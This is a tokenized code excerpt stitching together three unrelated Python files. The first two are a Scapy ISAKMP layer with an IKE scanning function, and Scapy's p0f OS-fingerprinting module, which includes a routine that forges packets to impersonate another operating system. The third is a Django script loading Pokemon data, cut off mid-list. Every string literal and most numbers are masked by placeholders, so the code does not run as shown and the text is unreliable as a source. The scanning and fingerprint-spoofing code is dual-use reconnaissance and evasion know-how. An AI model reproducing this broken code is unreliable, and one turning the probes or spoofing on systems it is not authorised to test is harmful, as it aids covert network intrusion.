"<STR_LIT>" , "<STR_LIT:H>" , adjust = lambda pkt , x : x + <NUM_LIT:4> ) , <EOL> StrLenField ( "<STR_LIT>" , "<STR_LIT>" , length_from = lambda x : x . length - <NUM_LIT:4> ) , <EOL> ] <EOL> class ISAKMP_payload_VendorID ( ISAKMP_class ) : <EOL> name = "<STR_LIT>" <EOL> overload_fields = { ISAKMP : { "<STR_LIT>" : <NUM_LIT> } } <EOL> fields_desc = [ <EOL> ByteEnumField ( "<STR_LIT>" , None , ISAKMP_payload_type ) , <EOL> ByteField ( "<STR_LIT>" , <NUM_LIT:0> ) , <EOL> FieldLenField ( "<STR_LIT>" , None , "<STR_LIT>" , "<STR_LIT:H>" , adjust = lambda pkt , x : x + <NUM_LIT:4> ) , <EOL> StrLenField ( "<STR_LIT>" , "<STR_LIT>" , length_from = lambda x : x . length - <NUM_LIT:4> ) , <EOL> ] <EOL> class ISAKMP_payload_SA ( ISAKMP_class ) : <EOL> name = "<STR_LIT>" <EOL> overload_fields = { ISAKMP : { "<STR_LIT>" : <NUM_LIT:1> } } <EOL> fields_desc = [ <EOL> ByteEnumField ( "<STR_LIT>" , None , ISAKMP_payload_type ) , <EOL> ByteField ( "<STR_LIT>" , <NUM_LIT:0> ) , <EOL> FieldLenField ( "<STR_LIT>" , None , "<STR_LIT>" , "<STR_LIT:H>" , adjust = lambda pkt , x : x + <NUM_LIT:12> ) , <EOL> IntEnumField ( "<STR_LIT>" , <NUM_LIT:1> , { <NUM_LIT:1> : "<STR_LIT>" } ) , <EOL> IntEnumField ( "<STR_LIT>" , <NUM_LIT:1> , { <NUM_LIT:1> : "<STR_LIT>" } ) , <EOL> PacketLenField ( "<STR_LIT>" , conf . raw_layer ( ) , ISAKMP_payload_Proposal , length_from = lambda x : x . length - <NUM_LIT:12> ) , <EOL> ] <EOL> class ISAKMP_payload_Nonce ( ISAKMP_class ) : <EOL> name = "<STR_LIT>" <EOL> overload_fields = { ISAKMP : { "<STR_LIT>" : <NUM_LIT:10> } } <EOL> fields_desc = [ <EOL> ByteEnumField ( "<STR_LIT>" , None , ISAKMP_payload_type ) , <EOL> ByteField ( "<STR_LIT>" , <NUM_LIT:0> ) , <EOL> FieldLenField ( "<STR_LIT>" , None , "<STR_LIT>" , "<STR_LIT:H>" , adjust = lambda pkt , x : x + <NUM_LIT:4> ) , <EOL> StrLenField ( "<STR_LIT>" , "<STR_LIT>" , length_from = lambda x : x . length - <NUM_LIT:4> ) , <EOL> ] <EOL> class ISAKMP_payload_KE ( ISAKMP_class ) : <EOL> name = "<STR_LIT>" <EOL> overload_fields = { ISAKMP : { "<STR_LIT>" : <NUM_LIT:4> } } <EOL> fields_desc = [ <EOL> ByteEnumField ( "<STR_LIT>" , None , ISAKMP_payload_type ) , <EOL> ByteField ( "<STR_LIT>" , <NUM_LIT:0> ) , <EOL> FieldLenField ( "<STR_LIT>" , None , "<STR_LIT>" , "<STR_LIT:H>" , adjust = lambda pkt , x : x + <NUM_LIT:4> ) , <EOL> StrLenField ( "<STR_LIT>" , "<STR_LIT>" , length_from = lambda x : x . length - <NUM_LIT:4> ) , <EOL> ] <EOL> class ISAKMP_payload_ID ( ISAKMP_class ) : <EOL> name = "<STR_LIT>" <EOL> overload_fields = { ISAKMP : { "<STR_LIT>" : <NUM_LIT:5> } } <EOL> fields_desc = [ <EOL> ByteEnumField ( "<STR_LIT>" , None , ISAKMP_payload_type ) , <EOL> ByteField ( "<STR_LIT>" , <NUM_LIT:0> ) , <EOL> FieldLenField ( "<STR_LIT>" , None , "<STR_LIT>" , "<STR_LIT:H>" , adjust = lambda pkt , x : x + <NUM_LIT:8> ) , <EOL> ByteEnumField ( "<STR_LIT>" , <NUM_LIT:1> , { <NUM_LIT:1> : "<STR_LIT>" , <NUM_LIT:11> : "<STR_LIT>" } ) , <EOL> ByteEnumField ( "<STR_LIT>" , <NUM_LIT:0> , { <NUM_LIT:0> : "<STR_LIT>" } ) , <EOL> ShortEnumField ( "<STR_LIT>" , <NUM_LIT:0> , { <NUM_LIT:0> : "<STR_LIT>" } ) , <EOL> StrLenField ( "<STR_LIT>" , "<STR_LIT>" , length_from = lambda x : x . length - <NUM_LIT:8> ) , <EOL> ] <EOL> class ISAKMP_payload_Hash ( ISAKMP_class ) : <EOL> name = "<STR_LIT>" <EOL> overload_fields = { ISAKMP : { "<STR_LIT>" : <NUM_LIT:8> } } <EOL> fields_desc = [ <EOL> ByteEnumField ( "<STR_LIT>" , None , ISAKMP_payload_type ) , <EOL> ByteField ( "<STR_LIT>" , <NUM_LIT:0> ) , <EOL> FieldLenField ( "<STR_LIT>" , None , "<STR_LIT>" , "<STR_LIT:H>" , adjust = lambda pkt , x : x + <NUM_LIT:4> ) , <EOL> StrLenField ( "<STR_LIT>" , "<STR_LIT>" , length_from = lambda x : x . length - <NUM_LIT:4> ) , <EOL> ] <EOL> ISAKMP_payload_type_overload = { } <EOL> for i in range ( len ( ISAKMP_payload_type ) ) : <EOL> name = "<STR_LIT>" % ISAKMP_payload_type [ i ] <EOL> if name in globals ( ) : <EOL> ISAKMP_payload_type_overload [ globals ( ) [ name ] ] = { "<STR_LIT>" : i } <EOL> del ( i ) <EOL> del ( name ) <EOL> ISAKMP_class . overload_fields = ISAKMP_payload_type_overload . copy ( ) <EOL> bind_layers ( UDP , ISAKMP , dport = <NUM_LIT> , sport = <NUM_LIT> ) <EOL> def ikescan ( ip ) : <EOL> return sr ( IP ( dst = ip ) / UDP ( ) / ISAKMP ( init_cookie = RandString ( <NUM_LIT:8> ) , <EOL> exch_type = <NUM_LIT:2> ) / ISAKMP_payload_SA ( prop = ISAKMP_payload_Proposal ( ) ) ) </s>
<s> """<STR_LIT>""" <EOL> from scapy . data import KnowledgeBase <EOL> from scapy . config import conf <EOL> from scapy . error import warning <EOL> from scapy . layers . inet import IP , TCP , TCPOptions <EOL> from scapy . packet import NoPayload <EOL> conf . p0f_base = "<STR_LIT>" <EOL> conf . p0fa_base = "<STR_LIT>" <EOL> conf . p0fr_base = "<STR_LIT>" <EOL> class p0fKnowledgeBase ( KnowledgeBase ) : <EOL> def __init__ ( self , filename ) : <EOL> KnowledgeBase . __init__ ( self , filename ) <EOL> def lazy_init ( self ) : <EOL> try : <EOL> f = open ( self . filename ) <EOL> except IOError : <EOL> warning ( "<STR_LIT>" % self . filename ) <EOL> return <EOL> try : <EOL> self . base = [ ] <EOL> for l in f : <EOL> if l [ <NUM_LIT:0> ] in [ "<STR_LIT:#>" , "<STR_LIT:\n>" ] : <EOL> continue <EOL> l = tuple ( l . split ( "<STR_LIT::>" ) ) <EOL> if len ( l ) < <NUM_LIT:8> : <EOL> continue <EOL> def a2i ( x ) : <EOL> if x . isdigit ( ) : <EOL> return int ( x ) <EOL> return x <EOL> li = [ a2i ( i ) for i in l [ <NUM_LIT:1> : <NUM_LIT:4> ] ] <EOL> self . base . append ( ( l [ <NUM_LIT:0> ] , li [ <NUM_LIT:0> ] , li [ <NUM_LIT:1> ] , li [ <NUM_LIT:2> ] , l [ <NUM_LIT:4> ] , l [ <NUM_LIT:5> ] , l [ <NUM_LIT:6> ] , l [ <NUM_LIT:7> ] [ : - <NUM_LIT:1> ] ) ) <EOL> except : <EOL> warning ( "<STR_LIT>" ) <EOL> self . base = None <EOL> f . close ( ) <EOL> p0f_kdb = p0fKnowledgeBase ( conf . p0f_base ) <EOL> p0fa_kdb = p0fKnowledgeBase ( conf . p0fa_base ) <EOL> p0fr_kdb = p0fKnowledgeBase ( conf . p0fr_base ) <EOL> def p0f_selectdb ( flags ) : <EOL> if flags & <NUM_LIT> == <NUM_LIT> : <EOL> return p0f_kdb <EOL> elif flags & <NUM_LIT> == <NUM_LIT> : <EOL> return p0fa_kdb <EOL> elif flags & <NUM_LIT> in [ <NUM_LIT> , <NUM_LIT> ] : <EOL> return p0fr_kdb <EOL> else : <EOL> return None <EOL> def packet2p0f ( pkt ) : <EOL> pkt = pkt . copy ( ) <EOL> pkt = pkt . __class__ ( bytes ( pkt ) ) <EOL> while pkt . haslayer ( IP ) and pkt . haslayer ( TCP ) : <EOL> pkt = pkt . getlayer ( IP ) <EOL> if isinstance ( pkt . payload , TCP ) : <EOL> break <EOL> pkt = pkt . payload <EOL> if not isinstance ( pkt , IP ) or not isinstance ( pkt . payload , TCP ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> db = p0f_selectdb ( pkt . payload . flags ) <EOL> ttl = pkt . ttl <EOL> df = ( pkt . flags & <NUM_LIT:2> ) / <NUM_LIT:2> <EOL> ss = len ( pkt ) <EOL> if ss > <NUM_LIT:100> : <EOL> if db == p0fr_kdb : <EOL> ss = '<STR_LIT:*>' <EOL> else : <EOL> ss = <NUM_LIT:0> <EOL> ooo = "<STR_LIT>" <EOL> mss = - <NUM_LIT:1> <EOL> qqT = False <EOL> qqP = False <EOL> ilen = ( pkt . payload . dataofs << <NUM_LIT:2> ) - <NUM_LIT:20> <EOL> for option in pkt . payload . options : <EOL> ilen -= <NUM_LIT:1> <EOL> if option [ <NUM_LIT:0> ] == "<STR_LIT>" : <EOL> ooo += "<STR_LIT:M>" + str ( option [ <NUM_LIT:1> ] ) + "<STR_LIT:U+002C>" <EOL> mss = option [ <NUM_LIT:1> ] <EOL> ilen -= <NUM_LIT:3> <EOL> elif option [ <NUM_LIT:0> ] == "<STR_LIT>" : <EOL> ooo += "<STR_LIT>" + str ( option [ <NUM_LIT:1> ] ) + "<STR_LIT:U+002C>" <EOL> ilen -= <NUM_LIT:2> <EOL> elif option [ <NUM_LIT:0> ] == "<STR_LIT>" : <EOL> if option [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] == <NUM_LIT:0> : <EOL> ooo += "<STR_LIT>" <EOL> else : <EOL> ooo += "<STR_LIT>" <EOL> if option [ <NUM_LIT:1> ] [ <NUM_LIT:1> ] != <NUM_LIT:0> : <EOL> qqT = True <EOL> ilen -= <NUM_LIT:9> <EOL> elif option [ <NUM_LIT:0> ] == "<STR_LIT>" : <EOL> ooo += "<STR_LIT>" <EOL> ilen -= <NUM_LIT:1> <EOL> elif option [ <NUM_LIT:0> ] == "<STR_LIT>" : <EOL> ooo += "<STR_LIT>" <EOL> elif option [ <NUM_LIT:0> ] == "<STR_LIT>" : <EOL> ooo += "<STR_LIT>" <EOL> if ilen > <NUM_LIT:0> : <EOL> qqP = True <EOL> else : <EOL> if type ( option [ <NUM_LIT:0> ] ) is str : <EOL> ooo += "<STR_LIT>" % TCPOptions [ <NUM_LIT:1> ] [ option [ <NUM_LIT:0> ] ] <EOL> else : <EOL> ooo += "<STR_LIT>" % option [ <NUM_LIT:0> ] <EOL> ooo = ooo [ : - <NUM_LIT:1> ] <EOL> if ooo == "<STR_LIT>" : ooo = "<STR_LIT:.>" <EOL> win = pkt . payload . window <EOL> if mss != - <NUM_LIT:1> : <EOL> if mss != <NUM_LIT:0> and win % mss == <NUM_LIT:0> : <EOL> win = "<STR_LIT:S>" + str ( win / mss ) <EOL> elif win % ( mss + <NUM_LIT> ) == <NUM_LIT:0> : <EOL> win = "<STR_LIT:T>" + str ( win / ( mss + <NUM_LIT> ) ) <EOL> win = str ( win ) <EOL> qq = "<STR_LIT>" <EOL> if db == p0fr_kdb : <EOL> if pkt . payload . flags & <NUM_LIT> == <NUM_LIT> : <EOL> qq += "<STR_LIT>" <EOL> if pkt . payload . seq == pkt . payload . ack : <EOL> qq += "<STR_LIT>" <EOL> if pkt . payload . seq == <NUM_LIT:0> : <EOL> qq += "<STR_LIT:0>" <EOL> if qqP : <EOL> qq += "<STR_LIT:P>" <EOL> if pkt . id == <NUM_LIT:0> : <EOL> qq += "<STR_LIT>" <EOL> if pkt . options != [ ] : <EOL> qq += "<STR_LIT:I>" <EOL> if pkt . payload . urgptr != <NUM_LIT:0> : <EOL> qq += "<STR_LIT>" <EOL> if pkt . payload . reserved != <NUM_LIT:0> : <EOL> qq += "<STR_LIT:X>" <EOL> if pkt . payload . ack != <NUM_LIT:0> : <EOL> qq += "<STR_LIT:A>" <EOL> if qqT : <EOL> qq += "<STR_LIT:T>" <EOL> qq += "<STR_LIT:F>" <EOL> if not isinstance ( pkt . payload . payload , NoPayload ) : <EOL> qq += "<STR_LIT:D>" <EOL> if qq == "<STR_LIT>" : <EOL> qq = "<STR_LIT:.>" <EOL> return ( db , ( win , ttl , df , ss , ooo , qq ) ) <EOL> def p0f_correl ( x , y ) : <EOL> d = <NUM_LIT:0> <EOL> d += ( x [ <NUM_LIT:0> ] == y [ <NUM_LIT:0> ] or y [ <NUM_LIT:0> ] == "<STR_LIT:*>" or ( y [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] == "<STR_LIT:%>" and x [ <NUM_LIT:0> ] . isdigit ( ) and ( int ( x [ <NUM_LIT:0> ] ) % int ( y [ <NUM_LIT:0> ] [ <NUM_LIT:1> : ] ) ) == <NUM_LIT:0> ) ) <EOL> d += ( y [ <NUM_LIT:1> ] >= x [ <NUM_LIT:1> ] and y [ <NUM_LIT:1> ] - x [ <NUM_LIT:1> ] < <NUM_LIT:32> ) <EOL> for i in [ <NUM_LIT:2> , <NUM_LIT:5> ] : <EOL> d += ( x [ i ] == y [ i ] or y [ i ] == '<STR_LIT:*>' ) <EOL> d += x [ <NUM_LIT:3> ] == y [ <NUM_LIT:3> ] <EOL> xopt = x [ <NUM_LIT:4> ] . split ( "<STR_LIT:U+002C>" ) <EOL> yopt = y [ <NUM_LIT:4> ] . split ( "<STR_LIT:U+002C>" ) <EOL> if len ( xopt ) == len ( yopt ) : <EOL> same = True <EOL> for i in range ( len ( xopt ) ) : <EOL> if not ( xopt [ i ] == yopt [ i ] or <EOL> ( len ( yopt [ i ] ) == <NUM_LIT:2> and len ( xopt [ i ] ) > <NUM_LIT:1> and <EOL> yopt [ i ] [ <NUM_LIT:1> ] == "<STR_LIT:*>" and xopt [ i ] [ <NUM_LIT:0> ] == yopt [ i ] [ <NUM_LIT:0> ] ) or <EOL> ( len ( yopt [ i ] ) > <NUM_LIT:2> and len ( xopt [ i ] ) > <NUM_LIT:1> and <EOL> yopt [ i ] [ <NUM_LIT:1> ] == "<STR_LIT:%>" and xopt [ i ] [ <NUM_LIT:0> ] == yopt [ i ] [ <NUM_LIT:0> ] and <EOL> int ( xopt [ i ] [ <NUM_LIT:1> : ] ) % int ( yopt [ i ] [ <NUM_LIT:2> : ] ) == <NUM_LIT:0> ) ) : <EOL> same = False <EOL> break <EOL> if same : <EOL> d += len ( xopt ) <EOL> return d <EOL> @ conf . commands . register <EOL> def p0f ( pkt ) : <EOL> """<STR_LIT>""" <EOL> db , sig = packet2p0f ( pkt ) <EOL> if db : <EOL> pb = db . get_base ( ) <EOL> else : <EOL> pb = [ ] <EOL> if not pb : <EOL> warning ( "<STR_LIT>" ) <EOL> return [ ] <EOL> r = [ ] <EOL> max = len ( sig [ <NUM_LIT:4> ] . split ( "<STR_LIT:U+002C>" ) ) + <NUM_LIT:5> <EOL> for b in pb : <EOL> d = p0f_correl ( sig , b ) <EOL> if d == max : <EOL> r . append ( ( b [ <NUM_LIT:6> ] , b [ <NUM_LIT:7> ] , b [ <NUM_LIT:1> ] - pkt [ IP ] . ttl ) ) <EOL> return r <EOL> def prnp0f ( pkt ) : <EOL> try : <EOL> r = p0f ( pkt ) <EOL> except : <EOL> return <EOL> if r == [ ] : <EOL> r = ( "<STR_LIT>" , "<STR_LIT:[>" + "<STR_LIT::>" . join ( [ str ( i ) for i in packet2p0f ( pkt ) [ <NUM_LIT:1> ] ] ) + "<STR_LIT>" , None ) <EOL> else : <EOL> r = r [ <NUM_LIT:0> ] <EOL> uptime = None <EOL> try : <EOL> uptime = pkt2uptime ( pkt ) <EOL> except : <EOL> pass <EOL> if uptime == <NUM_LIT:0> : <EOL> uptime = None <EOL> res = pkt . sprintf ( "<STR_LIT>" + r [ <NUM_LIT:0> ] + "<STR_LIT:U+0020>" + r [ <NUM_LIT:1> ] ) <EOL> if uptime is not None : <EOL> res += pkt . sprintf ( "<STR_LIT>" + str ( uptime // <NUM_LIT> ) + "<STR_LIT>" ) <EOL> else : <EOL> res += pkt . sprintf ( "<STR_LIT>" ) <EOL> if r [ <NUM_LIT:2> ] is not None : <EOL> res += "<STR_LIT>" + str ( r [ <NUM_LIT:2> ] ) + "<STR_LIT:)>" <EOL> print ( res ) <EOL> @ conf . commands . register <EOL> def pkt2uptime ( pkt , HZ = <NUM_LIT:100> ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( pkt , Packet ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if isinstance ( pkt , NoPayload ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if not isinstance ( pkt , TCP ) : <EOL> return pkt2uptime ( pkt . payload ) <EOL> for opt in pkt . options : <EOL> if opt [ <NUM_LIT:0> ] == "<STR_LIT>" : <EOL> t = opt [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] / HZ <EOL> return t <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> def p0f_impersonate ( pkt , osgenre = None , osdetails = None , signature = None , <EOL> extrahops = <NUM_LIT:0> , mtu = <NUM_LIT> , uptime = None ) : <EOL> """<STR_LIT>""" <EOL> pkt = pkt . copy ( ) <EOL> while pkt . haslayer ( IP ) and pkt . haslayer ( TCP ) : <EOL> pkt = pkt . getlayer ( IP ) <EOL> if isinstance ( pkt . payload , TCP ) : <EOL> break <EOL> pkt = pkt . payload <EOL> if not isinstance ( pkt , IP ) or not isinstance ( pkt . payload , TCP ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if uptime is None : <EOL> uptime = random . randint ( <NUM_LIT> , <NUM_LIT:100> * <NUM_LIT> * <NUM_LIT> * <NUM_LIT> * <NUM_LIT> ) <EOL> db = p0f_selectdb ( pkt . payload . flags ) <EOL> if osgenre : <EOL> pb = db . get_base ( ) <EOL> if pb is None : <EOL> pb = [ ] <EOL> pb = [ x for x in pb if x [ <NUM_LIT:6> ] == osgenre ] <EOL> if osdetails : <EOL> pb = [ x for x in pb if x [ <NUM_LIT:7> ] == osdetails ] <EOL> elif signature : <EOL> pb = [ signature ] <EOL> else : <EOL> pb = p0f_getlocalsigs ( ) [ db ] <EOL> if db == p0fr_kdb : <EOL> if pkt . payload . flags & <NUM_LIT> == <NUM_LIT> : <EOL> pb = [ x for x in pb if '<STR_LIT>' in x [ <NUM_LIT:5> ] ] <EOL> else : <EOL> pb = [ x for x in pb if '<STR_LIT>' not in x [ <NUM_LIT:5> ] ] <EOL> if not pb : <EOL> raise Scapy_Exception ( "<STR_LIT>" ) <EOL> pers = pb [ random . randint ( <NUM_LIT:0> , len ( pb ) - <NUM_LIT:1> ) ] <EOL> options = [ ] <EOL> if pers [ <NUM_LIT:4> ] != '<STR_LIT:.>' : <EOL> for opt in pers [ <NUM_LIT:4> ] . split ( '<STR_LIT:U+002C>' ) : <EOL> if opt [ <NUM_LIT:0> ] == '<STR_LIT:M>' : <EOL> if pers [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] == '<STR_LIT:S>' : <EOL> maxmss = ( <NUM_LIT:2> ** <NUM_LIT:16> - <NUM_LIT:1> ) / int ( pers [ <NUM_LIT:0> ] [ <NUM_LIT:1> : ] ) <EOL> else : <EOL> maxmss = ( <NUM_LIT:2> ** <NUM_LIT:16> - <NUM_LIT:1> ) <EOL> if opt [ <NUM_LIT:1> : ] == '<STR_LIT:*>' : <EOL> options . append ( ( '<STR_LIT>' , random . randint ( <NUM_LIT:1> , maxmss ) ) ) <EOL> elif opt [ <NUM_LIT:1> ] == '<STR_LIT:%>' : <EOL> coef = int ( opt [ <NUM_LIT:2> : ] ) <EOL> options . append ( ( '<STR_LIT>' , coef * random . randint ( <NUM_LIT:1> , maxmss / coef ) ) ) <EOL> else : <EOL> options . append ( ( '<STR_LIT>' , int ( opt [ <NUM_LIT:1> : ] ) ) ) <EOL> elif opt [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> if opt [ <NUM_LIT:1> : ] == '<STR_LIT:*>' : <EOL> options . append ( ( '<STR_LIT>' , RandByte ( ) ) ) <EOL> elif opt [ <NUM_LIT:1> ] == '<STR_LIT:%>' : <EOL> coef = int ( opt [ <NUM_LIT:2> : ] ) <EOL> options . append ( ( '<STR_LIT>' , coef * RandNum ( min = <NUM_LIT:1> , <EOL> max = ( <NUM_LIT:2> ** <NUM_LIT:8> - <NUM_LIT:1> ) / coef ) ) ) <EOL> else : <EOL> options . append ( ( '<STR_LIT>' , int ( opt [ <NUM_LIT:1> : ] ) ) ) <EOL> elif opt == '<STR_LIT>' : <EOL> options . append ( ( '<STR_LIT>' , ( <NUM_LIT:0> , <NUM_LIT:0> ) ) ) <EOL> elif opt == '<STR_LIT:T>' : <EOL> if '<STR_LIT:T>' in pers [ <NUM_LIT:5> ] : <EOL> options . append ( ( '<STR_LIT>' , ( uptime , random . randint ( <NUM_LIT:1> , <NUM_LIT:2> ** <NUM_LIT:32> - <NUM_LIT:1> ) ) ) ) <EOL> else : <EOL> options . append ( ( '<STR_LIT>' , ( uptime , <NUM_LIT:0> ) ) ) <EOL> elif opt == '<STR_LIT:S>' : <EOL> options . append ( ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> elif opt == '<STR_LIT:N>' : <EOL> options . append ( ( '<STR_LIT>' , None ) ) <EOL> elif opt == '<STR_LIT:E>' : <EOL> options . append ( ( '<STR_LIT>' , None ) ) <EOL> elif opt [ <NUM_LIT:0> ] == '<STR_LIT:?>' : <EOL> if int ( opt [ <NUM_LIT:1> : ] ) in TCPOptions [ <NUM_LIT:0> ] : <EOL> optname = TCPOptions [ <NUM_LIT:0> ] [ int ( opt [ <NUM_LIT:1> : ] ) ] [ <NUM_LIT:0> ] <EOL> optstruct = TCPOptions [ <NUM_LIT:0> ] [ int ( opt [ <NUM_LIT:1> : ] ) ] [ <NUM_LIT:1> ] <EOL> options . append ( ( optname , <EOL> struct . unpack ( optstruct , <EOL> RandString ( struct . calcsize ( optstruct ) ) . _fix ( ) ) ) ) <EOL> else : <EOL> options . append ( ( int ( opt [ <NUM_LIT:1> : ] ) , '<STR_LIT>' ) ) <EOL> else : <EOL> warning ( "<STR_LIT>" + opt ) <EOL> pkt . payload . options = options <EOL> if pers [ <NUM_LIT:0> ] == '<STR_LIT:*>' : <EOL> pkt . payload . window = RandShort ( ) <EOL> elif pers [ <NUM_LIT:0> ] . isdigit ( ) : <EOL> pkt . payload . window = int ( pers [ <NUM_LIT:0> ] ) <EOL> elif pers [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] == '<STR_LIT:%>' : <EOL> coef = int ( pers [ <NUM_LIT:0> ] [ <NUM_LIT:1> : ] ) <EOL> pkt . payload . window = coef * RandNum ( min = <NUM_LIT:1> , max = ( <NUM_LIT:2> ** <NUM_LIT:16> - <NUM_LIT:1> ) / coef ) <EOL> elif pers [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] == '<STR_LIT:T>' : <EOL> pkt . payload . window = mtu * int ( pers [ <NUM_LIT:0> ] [ <NUM_LIT:1> : ] ) <EOL> elif pers [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] == '<STR_LIT:S>' : <EOL> MSS = [ x for x in options if x [ <NUM_LIT:0> ] == '<STR_LIT>' ] <EOL> if not MSS : <EOL> raise Scapy_Exception ( "<STR_LIT>" ) <EOL> pkt . payload . window = MSS [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] * int ( pers [ <NUM_LIT:0> ] [ <NUM_LIT:1> : ] ) <EOL> else : <EOL> raise Scapy_Exception ( '<STR_LIT>' ) <EOL> pkt . ttl = pers [ <NUM_LIT:1> ] - extrahops <EOL> pkt . flags |= ( <NUM_LIT:2> * pers [ <NUM_LIT:2> ] ) <EOL> if pers [ <NUM_LIT:5> ] != '<STR_LIT:.>' : <EOL> for qq in pers [ <NUM_LIT:5> ] : <EOL> if qq == '<STR_LIT>' : pkt . id = <NUM_LIT:0> <EOL> elif qq == '<STR_LIT>' : pkt . payload . urgptr = RandShort ( ) <EOL> elif qq == '<STR_LIT:A>' : pkt . payload . ack = RandInt ( ) <EOL> elif qq == '<STR_LIT:F>' : <EOL> pkt . payload . flags |= RandChoice ( <NUM_LIT:8> , <NUM_LIT:32> , <NUM_LIT> ) <EOL> elif qq == '<STR_LIT:D>' and db != p0fo_kdb : <EOL> pkt /= conf . raw_layer ( load = RandString ( random . randint ( <NUM_LIT:1> , <NUM_LIT:10> ) ) ) <EOL> elif qq == '<STR_LIT>' : pkt . payload . seq = pkt . payload . ack <EOL> if '<STR_LIT:0>' in pers [ <NUM_LIT:5> ] : <EOL> pkt . payload . seq = <NUM_LIT:0> <EOL> elif pkt . payload . seq == <NUM_LIT:0> : <EOL> pkt . payload . seq = RandInt ( ) <EOL> while pkt . underlayer : <EOL> pkt = pkt . underlayer <EOL> return pkt <EOL> def p0f_getlocalsigs ( ) : <EOL> """<STR_LIT>""" <EOL> pid = os . fork ( ) <EOL> port = random . randint ( <NUM_LIT> , <NUM_LIT> ) <EOL> if pid > <NUM_LIT:0> : <EOL> result = { } <EOL> def addresult ( res ) : <EOL> if res [ <NUM_LIT:0> ] not in result : <EOL> result [ res [ <NUM_LIT:0> ] ] = [ res [ <NUM_LIT:1> ] ] <EOL> else : <EOL> if res [ <NUM_LIT:1> ] not in result [ res [ <NUM_LIT:0> ] ] : <EOL> result [ res [ <NUM_LIT:0> ] ] . append ( res [ <NUM_LIT:1> ] ) <EOL> iface = conf . route . route ( '<STR_LIT:127.0.0.1>' ) [ <NUM_LIT:0> ] <EOL> count = <NUM_LIT> <EOL> pl = sniff ( iface = iface , filter = '<STR_LIT>' + str ( port ) , count = count , timeout = <NUM_LIT:3> ) <EOL> map ( addresult , map ( packet2p0f , pl ) ) <EOL> os . waitpid ( pid , <NUM_LIT:0> ) <EOL> elif pid < <NUM_LIT:0> : <EOL> log_runtime . error ( "<STR_LIT>" ) <EOL> else : <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> s1 = socket . socket ( socket . AF_INET , type = socket . SOCK_STREAM ) <EOL> try : <EOL> s1 . connect ( ( '<STR_LIT:127.0.0.1>' , port ) ) <EOL> except socket . error : <EOL> pass <EOL> s1 . bind ( ( '<STR_LIT:127.0.0.1>' , port ) ) <EOL> s1 . connect ( ( '<STR_LIT:127.0.0.1>' , port ) ) <EOL> s1 . close ( ) <EOL> os . _exit ( <NUM_LIT:0> ) <EOL> return result </s>
<s> """<STR_LIT>""" <EOL> import csv <EOL> from pokemon . models import * <EOL> def build_pokes ( ) : <EOL> file = open ( '<STR_LIT>' , '<STR_LIT:rb>' ) <EOL> rdr = csv . reader ( file , delimiter = '<STR_LIT:U+002C>' ) <EOL> for row in rdr : <EOL> if row [ <NUM_LIT:0> ] != '<STR_LIT:id>' : <EOL> new_p = Pokemon ( <EOL> pkdx_id = int ( row [ <NUM_LIT:0> ] ) , <EOL> name = str ( row [ <NUM_LIT:1> ] ) , <EOL> exp = int ( row [ <NUM_LIT:5> ] ) , <EOL> catch_rate = <NUM_LIT:0> , <EOL> happiness = <NUM_LIT:0> , <EOL> hp = <NUM_LIT:0> , <EOL> attack = <NUM_LIT:0> , <EOL> defense = <NUM_LIT:0> , <EOL> speed = <NUM_LIT:0> , <EOL> sp_atk = <NUM_LIT:0> , <EOL> sp_def = <NUM_LIT:0> , <EOL> total = <NUM_LIT:0> , <EOL> egg_cycles = <NUM_LIT:0> , <EOL> ) <EOL> new_p . save ( ) <EOL> print '<STR_LIT>' % new_p . name <EOL> def build_abilities ( ) : <EOL> file = open ( '<STR_LIT>' , '<STR_LIT:rb>' ) <EOL> rdr = csv . reader ( file , delimiter = '<STR_LIT:U+002C>' ) <EOL> for row in rdr : <EOL> if row [ <NUM_LIT:0> ] != '<STR_LIT:id>' : <EOL> new_a = Ability ( <EOL> name = row [ <NUM_LIT:1> ] , <EOL> description = '<STR_LIT>' , <EOL> ) <EOL> new_a . save ( ) <EOL> print '<STR_LIT>' % new_a . name <EOL> def build_moves ( ) : <EOL> file = open ( '<STR_LIT>' , '<STR_LIT:rb>' ) <EOL> rdr = csv . reader ( file , delimiter = '<STR_LIT:U+002C>' ) <EOL> for row in rdr : <EOL> if row [ <NUM_LIT:0> ] != '<STR_LIT:id>' : <EOL> new_a = Move ( <EOL> name = row [ <NUM_LIT:1> ] , <EOL> description = '<STR_LIT>' , <EOL> ) <EOL> new_a . accuracy = row [ <NUM_LIT:6> ] if row [ <NUM_LIT:6> ] != '<STR_LIT>' else <NUM_LIT:0> <EOL> new_a . pp = row [ <NUM_LIT:5> ] if row [ <NUM_LIT:5> ] != '<STR_LIT>' else <NUM_LIT:0> <EOL> new_a . power = row [ <NUM_LIT:4> ] if row [ <NUM_LIT:4> ] != '<STR_LIT>' else <NUM_LIT:0> <EOL> new_a . save ( ) <EOL> print '<STR_LIT>' % new_a . name <EOL> def build_ability_pokes ( ) : <EOL> file = open ( '<STR_LIT>' , '<STR_LIT:rb>' ) <EOL> rdr = csv . reader ( file , delimiter = '<STR_LIT:U+002C>' ) <EOL> for row in rdr : <EOL> if row [ <NUM_LIT:0> ] != '<STR_LIT>' : <EOL> poke = Pokemon . objects . filter ( pkdx_id = row [ <NUM_LIT:0> ] ) [ <NUM_LIT:0> ] <EOL> ab = Ability . objects . get ( pk = int ( row [ <NUM_LIT:1> ] ) ) <EOL> poke . abilities . add ( ab ) <EOL> poke . save ( ) <EOL> print '<STR_LIT>' + ab . name + '<STR_LIT>' + poke . name <EOL> def build_move_pokes ( ) : <EOL> file = open ( '<STR_LIT>' , '<STR_LIT:rb>' ) <EOL> rdr = csv . reader ( file , delimiter = '<STR_LIT:U+002C>' ) <EOL> LEARN = [ '<STR_LIT>' , 